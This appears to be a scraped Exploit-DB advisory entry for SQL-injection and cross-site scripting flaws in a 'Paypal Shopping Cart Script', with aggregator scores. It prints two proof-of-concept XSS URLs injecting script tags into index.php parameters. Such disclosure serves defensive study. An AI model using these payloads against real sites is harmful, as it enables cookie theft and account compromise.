Lucene search

K
exploitdb599eme ManEDB-ID:34710
HistoryAug 21, 2009 - 12:00 a.m.

Paypal Shopping Cart Script - 'index.php' Multiple Cross-Site Scripting Vulnerabilities

2009-08-2100:00:00
599eme Man
www.exploit-db.com
22

AI Score

7.4

Confidence

Low

EPSS

0.002

Percentile

58.9%

source: https://www.securityfocus.com/bid/43471/info

Paypal Shopping Cart Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/paypalshopping/index.php?cid="><script>alert(document.cookie);</script>

http://www.example.com/paypalshopping/index.php?txtkeywords=%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&cmdSearch=Search

AI Score

7.4

Confidence

Low

EPSS

0.002

Percentile

58.9%

Related for EDB-ID:34710